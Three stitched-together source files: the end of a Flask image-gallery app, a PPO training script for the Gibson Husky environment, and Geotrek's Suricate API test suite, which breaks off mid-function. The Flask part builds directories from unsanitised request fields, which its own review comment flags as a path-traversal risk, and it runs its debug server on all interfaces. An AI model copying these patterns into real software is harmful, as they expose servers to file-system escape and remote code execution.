                # 0777 is a Python 2 octal literal (0o777 on Python 3).
                os.makedirs( thumbdir, 0777 )
            try:
                image = Image.open(image_path)
            except:
                # Not an image PIL can open: show a generic document icon.
                return redirect(u'/static/document.png')
            width = app.config['THUMB_WIDTH']
            height = app.config['THUMB_HEIGHT']
            # EXIF rotation must be applied before measuring/scaling.
            image = apply_orientation(image)
            if image.size[0] > width or image.size[1] > height:
                # Scale down on the longer edge, preserving aspect ratio.
                if image.size[0] > image.size[1]:
                    scale_with = float(width) / float(image.size[0])
                    newsize = (width, int(image.size[1] * scale_with))
                else:
                    scale_with = float(height) / float(image.size[1])
                    newsize = (int(image.size[0] * scale_with), height)
                #image = image.resize(newsize, Image.ANTIALIAS)
                # thumbnail() resizes in place (and never enlarges).
                image.thumbnail(newsize, Image.ANTIALIAS)
            image.save(os.path.join(THUMB_DIR, path), format='JPEG', optimize=True)
        else:
            app.logger.debug('No image found, %s', image_path)
    return send_from_directory(THUMB_DIR, path)
@app.route('/images/<path:path>')
def send_images(path):
    """Serve a full-size image straight out of IMAGE_DIR."""
    image_root = IMAGE_DIR
    return send_from_directory(image_root, path)
@app.route('/upload/', defaults={'path': ''}, methods=['POST'])
@app.route('/upload/<path:path>', methods=['POST'])
def upload(path):
    # Accept a fine-uploader style POST (the 'qqfile' field) and store it
    # under IMAGE_DIR/<path> via handle_upload (defined earlier in this file).
    handle_upload(request.files['qqfile'], request.form, path)
    # NOTE(review): flask.make_response expects (body, status); the
    # (200, dict) order here looks reversed -- confirm whether make_response
    # is a project-local helper before changing it.
    return make_response(200, { "success": True })
@app.route('/newdir', methods=['POST'])
def newdir():
    # Create a new sub-directory under IMAGE_DIR/<basedir> from form data,
    # then bounce back to the listing of <basedir>.
    dirname = request.form.get('dirname', type=str, default=None)
    basedir = request.form.get('basedir', type=str, default='')
    app.logger.debug( dirname )
    if dirname is not None:
        if not os.path.isdir( os.path.join( app.config['IMAGE_DIR'], basedir, dirname) ):
            app.logger.debug('Creating dir: %s%s', basedir, dirname)
            # NOTE(review): dirname/basedir come straight from the request and
            # are not sanitised here ('..' components could escape IMAGE_DIR)
            # -- confirm upstream protection or add validation.
            # 0770 is a Python 2 octal literal (0o770 on Python 3).
            os.mkdir( os.path.join( app.config['IMAGE_DIR'], basedir, dirname), 0770)
    return redirect(u'/list/{}'.format(basedir))
@app.route('/errortest')
def errortest():
    """Deliberately raise ZeroDivisionError to exercise error reporting
    (e.g. the Rollbar hook installed in init_rollbar)."""
    numerator, denominator = 1, 0
    return numerator / denominator
if __name__ == '__main__':
    # Development entry point: Flask's builtin server on all interfaces.
    app.run(debug=True, host='0.0.0.0', port=8080)
else:
    # Imported by a WSGI container (gunicorn/uwsgi look for 'application').
    application = app
|
<reponame>rainprob/GibsonEnv<filename>examples/train/train_husky_gibson_flagrun_ppo1.py
# add parent dir to find package. Only needed for source code build, pip install doesn't need it.
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
import gym, logging
from mpi4py import MPI
from gibson.envs.husky_env import HuskyGibsonFlagRunEnv
from baselines.common import set_global_seeds
from gibson.utils import pposgd_fuse
import baselines.common.tf_util as U
from gibson.utils import fuse_policy
from gibson.utils import utils
import datetime
from baselines import logger
from baselines import bench
import os.path as osp
import tensorflow as tf
import random
## Training code adapted from: https://github.com/openai/baselines/blob/master/baselines/ppo1/run_atari.py
def train(num_timesteps, seed):
    """Train a fused-policy PPO agent on the Husky Gibson flagrun env.

    :param num_timesteps: total environment steps (the learner runs for
        num_timesteps * 1.1)
    :param seed: base random seed; each MPI worker derives its own
    """
    rank = MPI.COMM_WORLD.Get_rank()
    # NOTE(review): relies on the module-level 'args' parsed in __main__.
    sess = utils.make_gpu_session(args.num_gpu)
    sess.__enter__()
    # sess = U.single_threaded_session()
    #sess = utils.make_gpu_session(args.num_gpu)
    #sess.__enter__()
    #if args.meta != "":
    #    saver = tf.train.import_meta_graph(args.meta)
    #    saver.restore(sess, tf.train.latest_checkpoint('./'))
    if rank == 0:
        logger.configure()
    else:
        # Silence logger output on non-root MPI workers.
        logger.configure(format_strs=[])
    # Distinct but reproducible seed per worker.
    workerseed = seed + 10000 * MPI.COMM_WORLD.Get_rank()
    set_global_seeds(workerseed)
    config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'configs',
                               'husky_gibson_flagrun_train.yaml')
    print(config_file)
    env = HuskyGibsonFlagRunEnv(config = config_file, gpu_idx=args.gpu_idx)
    print(env.sensor_space)
    def policy_fn(name, ob_space, sensor_space, ac_space):
        # Policy fusing camera observations with proprioceptive sensors.
        return fuse_policy.FusePolicy(name=name, ob_space=ob_space, sensor_space = sensor_space, ac_space=ac_space, save_per_acts=10000, hid_size=64, num_hid_layers=2, session=sess)
    #env = bench.Monitor(env, logger.get_dir() and
    #    osp.join(logger.get_dir(), str(rank)))
    #env.seed(workerseed)
    gym.logger.setLevel(logging.WARN)
    pposgd_fuse.learn(env, policy_fn,
                      max_timesteps=int(num_timesteps * 1.1),
                      timesteps_per_actorbatch=2048,
                      clip_param=0.2, entcoeff=0.01,
                      optim_epochs=4, optim_stepsize=1e-3, optim_batchsize=64,
                      gamma=0.99, lam=0.95,
                      schedule='linear',
                      save_name=args.save_name,
                      save_per_acts=50,
                      reload_name=args.reload_name
                      )
    env.close()
def callback(lcl, glb):
    """Early-stop hook: solved once past 2000 steps with a mean reward of
    at least -50 over the last 100 completed episodes (the most recent,
    possibly unfinished, episode is excluded)."""
    mean_reward = sum(lcl['episode_rewards'][-101:-1]) / 100
    steps = lcl['t']
    return steps > 2000 and mean_reward >= -50
def main():
    """Kick off training: fixed seed, 10M environment steps."""
    train(seed=5, num_timesteps=10000000)
if __name__ == '__main__':
    import argparse
    # Show default values in --help output.
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--mode', type=str, default="RGB")            # sensor modality
    parser.add_argument('--num_gpu', type=int, default=1)             # GPUs for the TF session
    parser.add_argument('--gpu_idx', type=int, default=0)             # GPU used by the Gibson renderer
    parser.add_argument('--disable_filler', action='store_true', default=False)
    parser.add_argument('--meta', type=str, default="")               # optional .meta graph to restore
    parser.add_argument('--reload_name', type=str, default=None)      # checkpoint to resume from
    parser.add_argument('--save_name', type=str, default="flagrun_RGBD2")  # checkpoint name prefix
    # 'args' is read as a module-level global by train().
    args = parser.parse_args()
    #assert (args.mode != "SENSOR"), "Currently PPO does not support SENSOR mode"
    main()
|
<reponame>GeotrekCE/Geotrek
import io
import os
import uuid
from unittest import mock
from unittest.mock import MagicMock
from django.core import mail
from django.core.management import call_command
from django.test import TestCase
from django.test.utils import override_settings
from django.urls.base import reverse
from django.utils.translation import gettext_lazy as _
from mapentity.tests.factories import SuperUserFactory, UserFactory
from geotrek.authent.tests.factories import UserProfileFactory
from geotrek.common.models import Attachment
from geotrek.feedback.forms import ReportForm
from geotrek.feedback.helpers import SuricateMessenger, SuricateRequestManager
from geotrek.feedback.models import (AttachedMessage, Report, ReportActivity,
ReportProblemMagnitude, ReportStatus, WorkflowManager)
from geotrek.feedback.tests.factories import (ReportFactory,
ReportStatusFactory,
WorkflowManagerFactory)
# Connection settings for Suricate's "Standard" (report submission) API.
# Keys and credentials are deliberately blank for tests.
SURICATE_REPORT_SETTINGS = {
    "URL": "http://suricate.wsstandard.example.com/",
    "ID_ORIGIN": "geotrek",
    "PRIVATE_KEY_CLIENT_SERVER": "",
    "PRIVATE_KEY_SERVER_CLIENT": "",
    "AUTH": ("", ""),
}
# Connection settings for Suricate's "Management" API.
SURICATE_MANAGEMENT_SETTINGS = {
    "URL": "http://suricate.wsmanagement.example.com/",
    "ID_ORIGIN": "geotrek",
    "PRIVATE_KEY_CLIENT_SERVER": "",
    "PRIVATE_KEY_SERVER_CLIENT": "",
    "AUTH": ("", ""),
}
# Workflow-mode timers (in days) and the canned relocation message.
SURICATE_WORKFLOW_SETTINGS = {
    "TIMER_FOR_WAITING_REPORTS_IN_DAYS": 6,
    "TIMER_FOR_PROGRAMMED_REPORTS_IN_DAYS": 7,
    "SURICATE_RELOCATED_REPORT_MESSAGE": "Le Signalement ne concerne pas le Département du Gard - Relocalisé hors du Département"
}
def mocked_json(file_name):
    """Load a JSON fixture from the tests' data directory as UTF-8 bytes."""
    fixture_path = os.path.join(os.path.dirname(__file__), "data", file_name)
    with open(fixture_path, "r") as fixture:
        return fixture.read().encode("UTF-8")
def mocked_image(file_name):
    """Load a binary image fixture from the tests' data directory."""
    fixture_path = os.path.join(os.path.dirname(__file__), "data", file_name)
    with open(fixture_path, "rb") as fixture:
        raw = fixture.read()
    return bytearray(raw)
@override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
@override_settings(SURICATE_MANAGEMENT_SETTINGS=SURICATE_MANAGEMENT_SETTINGS)
class SuricateTests(TestCase):
    """Test Suricate API"""

    def build_get_request_patch(self, mocked: MagicMock, cause_JPG_error=False, remove_one_alert=False):
        """Mock get requests to Suricate API"""
        def build_response_patch(url, params=None, **kwargs):
            # Dispatch on the endpoint name embedded in the URL and return a
            # canned fixture response; anything unrecognised gets a 404.
            mock_response = MagicMock()
            if "GetActivities" in url:
                mock_response.status_code = 200
                mock_response.content = mocked_json("suricate_activities.json")
            elif "GetStatusList" in url:
                mock_response.status_code = 200
                mock_response.content = mocked_json("suricate_statuses.json")
            elif "GetAlerts" in url and not remove_one_alert:
                mock_response.content = mocked_json("suricate_alerts.json")
                mock_response.status_code = 200
            elif "GetAlerts" in url and remove_one_alert:
                # Same alerts minus one, to simulate a report relocated
                # outside of the BBOX between two syncs.
                mock_response.content = mocked_json("suricate_alerts_later.json")
                mock_response.status_code = 200
            elif "wsLockAlert" in url or "wsUnlockAlert" in url or "wsUpdateGPS" in url:
                mock_response.content = mocked_json("suricate_positive.json")
                mock_response.status_code = 200
            elif cause_JPG_error:
                # Simulate failing attachment downloads.
                mock_response.status_code = 404
            elif ".jpg" in url or ".png" in url or ".JPG" in url:
                mock_response.content = mocked_image("theme-fauna.png")
                mock_response.status_code = 200
            else:
                mock_response.status_code = 404
            return mock_response
        mocked.side_effect = build_response_patch

    def build_post_request_patch(self, mocked: MagicMock):
        """Mock post requests to Suricate API"""
        def build_response_patch(url, params=None, **kwargs):
            mock_response = MagicMock()
            if "SendReport" in url or "UpdateStatus" in url or "MessageSentinel" in url:
                mock_response.status_code = 200
                mock_response.content = mocked_json(
                    "suricate_positive.json"
                )
            else:
                mock_response.status_code = 404
            return mock_response
        mocked.side_effect = build_response_patch

    def build_failed_request_patch(self, mocked: MagicMock):
        """Mock error responses from Suricate API"""
        mock_response = mock.Mock()
        mock_response.content = mocked_json("suricate_negative.json")
        mock_response.status_code = 400
        mocked.return_value = mock_response

    def build_timeout_request_patch(self, mocked: MagicMock):
        """Mock error responses from Suricate API"""
        mock_response = mock.Mock()
        mock_response.status_code = 408  # request timeout
        mock_response.content = {}
        mocked.return_value = mock_response

    @classmethod
    def setUpTestData(cls):
        # A regular user who is also the workflow manager, plus an admin
        # that the tests log in as.
        cls.user = UserFactory()
        UserProfileFactory.create(user=cls.user)
        cls.workflow_manager = WorkflowManagerFactory(user=cls.user)
        cls.admin = SuperUserFactory(username="Admin", password="<PASSWORD>")

    def setUp(self):
        self.client.force_login(self.admin)
class SuricateAPITests(SuricateTests):
    """Exercise the sync_suricate command and the Suricate request helpers
    against mocked HTTP responses.

    All ``assertEquals`` calls were modernised to ``assertEqual``: the former
    is a deprecated alias removed in Python 3.12.
    """

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_statuses(self, mocked_get, mocked_logger):
        """Test GET requests on Statuses endpoint creates statuses objects"""
        self.build_get_request_patch(mocked_get)
        call_command("sync_suricate", statuses=True)
        self.assertEqual(ReportStatus.objects.count(), 5)
        mocked_logger.info.assert_called_with("New status - id: classified, label: Classé sans suite")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_activities(self, mocked_get, mocked_logger):
        """Test GET requests on Activities endpoint creates statuses objects"""
        self.build_get_request_patch(mocked_get)
        call_command("sync_suricate", activities=True)
        self.assertEqual(ReportActivity.objects.count(), 32)
        mocked_logger.info.assert_called_with("New activity - id: 51, label: Roller, Skateboard")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_activities_and_statuses(self, mocked):
        """Test GET requests on both Activities and Statuses endpoint creates objects"""
        self.build_get_request_patch(mocked)
        call_command("sync_suricate", activities=True, statuses=True)
        self.assertEqual(ReportActivity.objects.count(), 32)
        self.assertEqual(ReportStatus.objects.count(), 5)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @mock.patch("geotrek.feedback.management.commands.sync_suricate.logger")
    def test_command_disabled(self, mocked):
        """Test sync_suricate command is disabled when setting is False"""
        call_command("sync_suricate", activities=True, statuses=True)
        mocked.error.assert_called_with("To use this command, please activate setting SURICATE_MANAGEMENT_ENABLED or SURICATE_WORKFLOW_ENABLED.")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_alerts_creates_alerts_and_send_mail(self, mocked_get, mocked_logger):
        """Test GET requests on Alerts endpoint creates alerts and related objects, and sends an email"""
        self.build_get_request_patch(mocked_get, cause_JPG_error=True)
        self.assertEqual(len(mail.outbox), 0)
        call_command("sync_suricate", verbosity=2)
        # 8 out of 9 are imported because one of them is out of bbox by design
        self.assertEqual(Report.objects.count(), 8)
        self.assertEqual(ReportProblemMagnitude.objects.count(), 3)
        self.assertEqual(AttachedMessage.objects.count(), 44)
        self.assertEqual(Attachment.objects.count(), 6)
        self.assertEqual(len(mail.outbox), 1)
        sent_mail = mail.outbox[0]
        self.assertEqual(sent_mail.subject, "Geotrek - New reports from Suricate")
        self.assertIn("New reports have been imported from Suricate", sent_mail.body)
        self.assertIn("Please consult your reports in Geotrek-Admin", sent_mail.body)
        for report in Report.objects.all():
            self.assertIn(report.full_url, sent_mail.body)
        r = Report.objects.all()[0]
        r.category = None
        r.save()
        # Fetch it again to verify 'super.save' was called (management mode)
        r.refresh_from_db()
        self.assertIsNone(r.category)
        # Test new filed report are not assigned to workflow manager when mode is management
        r = Report.objects.get(external_uuid="E7C73347-5056-AA2B-DDBFDCD9328CD742")
        self.assertIsNone(r.assigned_user)
        # Assert no new mail on update
        self.assertEqual(len(mail.outbox), 1)
        # Test sync specific report overwrites local info
        r.comment = ""
        r.save()
        r.refresh_from_db()
        self.assertEqual(r.comment, "")
        call_command("sync_suricate", report=r.pk, verbosity=2)
        r.refresh_from_db()
        self.assertEqual(r.comment, "Ne pas prendre la route Départementale 155 en direction de Malons")
        # Test sync last report overwrites local info
        r = Report.objects.get(external_uuid="7EE5DF25-5056-AA2B-DDBEEFA5768CD53E")
        self.assertEqual(r.comment, "Lames cassées")
        r.comment = ""
        r.save()
        r.refresh_from_db()
        self.assertEqual(r.comment, "")
        call_command("sync_suricate", report=0, verbosity=2)
        r.refresh_from_db()
        self.assertEqual(r.comment, "Lames cassées")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.ContentFile.__init__")
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_sync_handles_malformed_images(self, mocked_get, mocked_logger, mocked_save):
        """Test Suricate sync is not interupted by corruped images"""
        # (docstring moved above the first statement so Python and test
        # runners actually pick it up as the method's docstring)
        self.build_get_request_patch(mocked_get)
        mocked_save.side_effect = Exception("This image is bad")
        call_command("sync_suricate", verbosity=2)
        mocked_logger.error.assert_called()

    @override_settings(SURICATE_WORKFLOW_ENABLED=True)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_alerts_creates_alerts_and_send_mail_and_assign(self, mocked_get):
        """Test GET requests on Alerts endpoint creates alerts and related objects, and sends an email"""
        self.build_get_request_patch(mocked_get, cause_JPG_error=True)
        self.assertEqual(len(mail.outbox), 0)
        call_command("sync_suricate", verbosity=2)
        # 8 out of 9 are imported because one of them is out of bbox by design
        self.assertEqual(Report.objects.count(), 8)
        self.assertEqual(ReportProblemMagnitude.objects.count(), 3)
        self.assertEqual(AttachedMessage.objects.count(), 44)
        self.assertEqual(Attachment.objects.count(), 6)
        self.assertEqual(len(mail.outbox), 1)
        sent_mail = mail.outbox[0]
        self.assertEqual(sent_mail.subject, "Geotrek - New reports from Suricate")
        # Test update report does not send email and saves
        r = Report.objects.all()[0]
        r.category = None
        r.save()
        # Fetch it again to verify 'super.save' was called (management mode)
        r.refresh_from_db()
        self.assertIsNone(r.category)
        # Test new filed report are assigned to workflow manager
        r = Report.objects.get(external_uuid="E7C73347-5056-AA2B-DDBFDCD9328CD742")
        self.assertIn(r.assigned_user.pk, list(WorkflowManager.objects.values_list('user', flat=True)))
        # Assert no new mail on update
        self.assertEqual(len(mail.outbox), 1)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_failed_attachments_are_downloaded_on_next_sync(self, mocked_get, mocked_logger):
        """Test failed requests to download attachments are retried on next sync"""
        self.assertEqual(Attachment.objects.count(), 0)
        # Fail to download all images
        self.build_get_request_patch(mocked_get, cause_JPG_error=True)
        call_command("sync_suricate", verbosity=2)
        self.assertEqual(Attachment.objects.count(), 6)
        for atta in Attachment.objects.all():
            # All attachments are missing their image file
            self.assertFalse(atta.attachment_file.name)
        # Succesfully download all images
        self.build_get_request_patch(mocked_get, cause_JPG_error=False)
        call_command("sync_suricate", verbosity=2)
        self.assertEqual(Attachment.objects.count(), 6)
        for atta in Attachment.objects.all():
            # No attachments are missing their image file
            self.assertTrue(atta.attachment_file.name)
        # Succesfully download all images a second time to cover "skip file" case
        call_command("sync_suricate", verbosity=2)
        self.assertEqual(Attachment.objects.count(), 6)
        for atta in Attachment.objects.all():
            # No attachments are missing their image file
            self.assertTrue(atta.attachment_file.name)

    @override_settings(PAPERCLIP_ENABLE_LINK=False)
    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    def test_sync_needs_paperclip_enabled(self):
        """Sync must refuse to run when paperclip links are disabled."""
        with self.assertRaises(Exception):
            call_command("sync_suricate", verbosity=2)

    @override_settings(SURICATE_REPORT_ENABLED=True)
    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.post_report")
    def test_save_on_report_posts_to_suricate_in_report_mode(self, post_report):
        """Test post to suricate on save Report in Suricate Report Mode"""
        report = Report.objects.create()
        post_report.assert_called_once_with(report)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
    @mock.patch("geotrek.feedback.helpers.SuricateMessenger.post_report")
    def test_save_on_report_posts_to_suricate_in_management_mode(self, post_report):
        """Test post to suricate on save Report in Suricate Management Mode"""
        # Create a report with an UID - emulates report from Suricate
        uid = uuid.uuid4()
        Report.objects.create(external_uuid=uid)
        post_report.assert_not_called()
        # Create a report with no UID - emulates new report from Geotrek
        report = Report.objects.create(external_uuid=None)
        post_report.assert_called_once_with(report)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @override_settings(SURICATE_REPORT_ENABLED=False)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_save_on_report_doesnt_post_to_suricate_in_no_suricate_mode(self, post_report):
        """Test save does not post to suricate on save Report in No Suricate Mode"""
        Report.objects.create()
        post_report.assert_not_called()

    @mock.patch("geotrek.feedback.helpers.requests.post")
    def test_post_request_to_suricate(self, mock_post):
        """Test post request itself
        Request post is mock
        """
        # Create a report without saving it
        report = ReportFactory.build()
        # Define a mock response
        self.build_post_request_patch(mock_post)
        # Call the function with the report
        result = SuricateMessenger().post_report(report)
        self.assertEqual(result, None)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_request_to_suricate_fails_1(self, mock_get):
        """Test get request itself fails
        """
        # Mock error 408
        self.build_timeout_request_patch(mock_get)
        # Get raises an exception
        with self.assertRaises(Exception):
            SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_request_to_suricate_fails_2(self, mock_get):
        """Test get request itself fails
        """
        # Mock error 400
        self.build_failed_request_patch(mock_get)
        # Get raises an exception
        with self.assertRaises(Exception):
            SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("sys.stdout", new_callable=io.StringIO)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_connection_test(self, mock_get, mocked_stdout):
        """Assert connection test command outputs OK
        """
        self.build_get_request_patch(mock_get)
        call_command("sync_suricate", test=True)
        # Assert outputs OK
        self.assertEqual(mocked_stdout.getvalue(), 'API Standard :\nOK\nAPI Gestion :\nOK\n')

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("sys.stdout", new_callable=io.StringIO)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_connection_test_fails_API(self, mock_get, mocked_stdout):
        """Assert connection test command outputs error when it fails on Suricate API side
        """
        # Mock negative response
        self.build_failed_request_patch(mock_get)
        # Assert outputs KO
        call_command("sync_suricate", test=True)
        self.assertEqual(mocked_stdout.getvalue(), "API Standard :\nKO - Status code: 400\nAPI Gestion :\nKO - Status code: 400\n")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("sys.stdout", new_callable=io.StringIO)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_connection_test_fails_HTTP(self, mock_get, mocked_stdout):
        """Assert connection test command outputs error when it fails on HTTP
        """
        # Mock error 408
        self.build_timeout_request_patch(mock_get)
        # Assert outputs KO
        call_command("sync_suricate", test=True)
        self.assertEqual(mocked_stdout.getvalue(), "API Standard :\nKO - Status code: 408\nAPI Gestion :\nKO - Status code: 408\n")

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.logger")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_relocated_report_is_deleted_on_next_sync(self, mocked_get, mocked_logger):
        """Test reports relocated outside of BBOX are deleted on next sync"""
        self.build_get_request_patch(mocked_get, remove_one_alert=False)
        call_command("sync_suricate", verbosity=2)
        # 8 out of 9 are imported because one of them is out of bbox by design
        self.assertEqual(Report.objects.filter(external_uuid="742CBF16-5056-AA2B-DD1FD403F72D6B9B").count(), 1)
        self.assertEqual(Report.objects.count(), 8)
        # Second sync: the alerts fixture without that report simulates a
        # relocation outside of the BBOX on Suricate's side.
        self.build_get_request_patch(mocked_get, remove_one_alert=True)
        call_command("sync_suricate", verbosity=2)
        # One out of the 9 was removed from response because this report now lives outside of BBOX according to Suricate
        # 7 out of 8 are imported because one of them is out of bbox by design
        self.assertEqual(Report.objects.filter(external_uuid="742CBF16-5056-AA2B-DD1FD403F72D6B9B").count(), 0)
        self.assertEqual(Report.objects.count(), 7)
class SuricateInterfaceTests(SuricateTests):
    # Tests for the "import from Suricate" button in the web interface.

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_import_from_interface_disabled(self, mocked):
        # The import widget must be hidden and the POST a no-op when
        # management mode is off.
        user = UserFactory.create(username='Slush', password='<PASSWORD>')
        self.client.force_login(user)
        self.build_get_request_patch(mocked)
        url = reverse('common:import_dataset')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertNotContains(response, 'import-suricate')
        self.assertNotContains(response, _('Data to import from Suricate'))
        response = self.client.post(
            url, {
                'import-suricate': 'Import',
                'parser': 'everything',
            }
        )
        self.assertEqual(Report.objects.count(), 0)

    @override_settings(SURICATE_MANAGEMENT_ENABLED=True)
    @mock.patch("geotrek.feedback.parsers.SuricateParser.get_alerts")
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_import_from_interface_enabled(self, mocked_get, mocked_parser):
        # With management mode on, the widget shows and posting triggers
        # the parser exactly once.
        user = UserFactory.create(username='Slush', password='<PASSWORD>')
        self.client.force_login(user)
        # mocked_parser = mock.Mock()
        self.build_get_request_patch(mocked_get)
        url = reverse('common:import_dataset')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'import-suricate')
        self.assertContains(response, _('Data to import from Suricate'))
        response = self.client.post(
            url, {
                'import-suricate': 'Import',
                'parser': 'everything',
            }
        )
        self.assertEqual(response.status_code, 200)
        mocked_parser.assert_called_once()

    @override_settings(SURICATE_MANAGEMENT_ENABLED=False)
    @override_settings(SURICATE_REPORT_SETTINGS=SURICATE_REPORT_SETTINGS)
    @mock.patch("geotrek.feedback.helpers.requests.get")
    def test_get_request_to_suricate_fails_1(self, mock_get):
        """Test get request itself fails
        """
        # NOTE(review): this method duplicates
        # SuricateAPITests.test_get_request_to_suricate_fails_1 verbatim --
        # probably a copy/paste leftover; confirm whether it can be removed.
        # Mock error 408
        self.build_timeout_request_patch(mock_get)
        # Get raises an exception
        with self.assertRaises(Exception):
            SuricateRequestManager().get_suricate(endpoint="wsGetStatusList")
class SuricateWorkflowTests(SuricateTests):
    # Base class for workflow-mode tests: pre-creates the whole set of
    # report statuses the workflow state machine relies on.
    fixtures = ['geotrek/maintenance/fixtures/basic.json']

    @classmethod
    def setUpTestData(cls):
        # Explicit parent-class call (no super()) so subclasses can chain
        # their own setUpTestData the same way.
        SuricateTests.setUpTestData()
        cls.filed_status = ReportStatusFactory(identifier='filed', label="Déposé")
        cls.classified_status = ReportStatusFactory(identifier='classified', label="Classé sans suite")
        cls.programmed_status = ReportStatusFactory(identifier='programmed', label="Programmé")
        cls.waiting_status = ReportStatusFactory(identifier='waiting', label="En cours")
        cls.rejected_status = ReportStatusFactory(identifier='rejected', label="Rejeté")
        cls.late_intervention_status = ReportStatusFactory(identifier='late_intervention', label="Intervention en retard")
        cls.late_resolution_status = ReportStatusFactory(identifier='late_resolution', label="Resolution en retard")
        cls.solved_intervention_status = ReportStatusFactory(identifier='solved_intervention', label="Intervention terminée")
        cls.resolved_status = ReportStatusFactory(identifier='solved', label="Résolu")
        cls.report = ReportFactory(status=cls.filed_status, external_uuid=uuid.uuid4())
        cls.admin = SuperUserFactory(username="Admiin", password="<PASSWORD>")
        cls.interv_report = ReportFactory(status=cls.programmed_status)
def raise_multiple(exceptions):
    # Raise every exception in *exceptions*, consuming the list from the
    # end. The raise-in-finally recursion makes each raised exception the
    # implicit __context__ of the next, so all failures stay visible in
    # the final traceback. The list is emptied in place.
    if not exceptions:  # list emptied, recursion ends
        return
    try:
        raise exceptions.pop()  # pop removes list entries
    finally:
        raise_multiple(exceptions)  # recursion
def test_for_all_suricate_modes(test_func):
    # Decorator: run *test_func* once per Suricate mode (none / report /
    # management / workflow), collect AssertionErrors, and re-raise them
    # all at the end via raise_multiple, each tagged with its mode.
    def inner(self, *args, **kwargs):
        exceptions = []
        try:
            with override_settings(SURICATE_REPORT_ENABLED=False, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'No Suricate' mode",)
            exceptions.append(e)
        try:
            with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'Suricate Report' mode",)
            exceptions.append(e)
        try:
            with override_settings(SURICATE_REPORT_ENABLED=True, SURICATE_MANAGEMENT_ENABLED=True, SURICATE_WORKFLOW_ENABLED=False, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'Suricate Management' mode",)
            exceptions.append(e)
        try:
            with override_settings(SURICATE_REPORT_ENABLED=False, SURICATE_MANAGEMENT_ENABLED=False, SURICATE_WORKFLOW_ENABLED=True, LANGUAGE_CODE='fr'):
                test_func(self, *args, **kwargs)
        except AssertionError as e:
            e.args += ("Failed for 'Suricate Workflow' mode",)
            exceptions.append(e)
        raise_multiple(exceptions)
    return inner
def test_for_report_and_basic_modes(test_func):
    """Decorator: run *test_func* under both the 'No Suricate' and the
    'Suricate Report' settings, collecting AssertionErrors and re-raising
    them all at the end (each tagged with the mode that failed)."""
    def inner(self, *args, **kwargs):
        collected = []
        modes = (
            (False, "Failed for 'No Suricate' mode"),
            (True, "Failed for 'Suricate Report' mode"),
        )
        for report_enabled, failure_tag in modes:
            try:
                with override_settings(SURICATE_REPORT_ENABLED=report_enabled,
                                       SURICATE_MANAGEMENT_ENABLED=False,
                                       SURICATE_WORKFLOW_ENABLED=False,
                                       LANGUAGE_CODE='fr'):
